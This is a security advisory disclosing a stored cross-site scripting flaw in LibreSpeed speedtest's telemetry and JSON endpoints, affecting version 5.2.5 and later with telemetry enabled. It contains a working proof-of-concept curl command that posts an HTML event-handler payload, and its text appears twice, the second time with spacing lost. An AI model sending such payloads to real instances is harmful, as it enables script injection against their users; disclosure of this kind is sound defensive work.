Summary
Missing neutralization of the ISP information in a speedtest result and an incorrect Content-Type HTTP header in the JSON API leads to stored Cross-site scripting vulnerability.
Details
The processedString field in the ispinfo parameter is missing neutralization. It is stored when a user submits a speedtest result to the telemetry API (results/telemetry.php) and returned in the JSON API (results/json.php). The JSON API also doesn't set Content-Type: application/json HTTP header.
This vulnerability has been introduced in 3937b94.
PoC
- Start Librespeed with telemetry enabled:
docker run -it -p 80:80 -e TELEMETRY=true ghcr.io/librespeed/speedtest
- Send an arbitrarily crafted speedtest result:
curl "http://localhost/results/telemetry.php" --data 'ispinfo={"processedString":"foo - bar <body onpageshow=alert`XSS`>"}&dl=1&ul=1&ping=1&jitter=1&log=&extra='
- Open JSON endpoint with speedtest ID from above, e.g.
http://localhost/results/json.php?id=1
Impact
This vulnerability affects LibreSpeed speedtest instances running version 5.2.5 or higher and have telemetry enabled.
Summary
Missing neutralization of the ISP information in a speedtest result and an incorrect
Content-TypeHTTP header in the JSON API leads to stored Cross-site scripting vulnerability.Details
The
processedStringfield in theispinfoparameter is missing neutralization. It is stored when a user submits a speedtest result to the telemetry API (results/telemetry.php) and returned in the JSON API (results/json.php). The JSON API also doesn't setContent-Type: application/jsonHTTP header.This vulnerability has been introduced in 3937b94.
PoC
docker run -it -p 80:80 -e TELEMETRY=true ghcr.io/librespeed/speedtestcurl "http://localhost/results/telemetry.php" --data 'ispinfo={"processedString":"foo - bar <body onpageshow=alert`XSS`>"}&dl=1&ul=1&ping=1&jitter=1&log=&extra='http://localhost/results/json.php?id=1Impact
This vulnerability affects LibreSpeed speedtest instances running version 5.2.5 or higher and have telemetry enabled.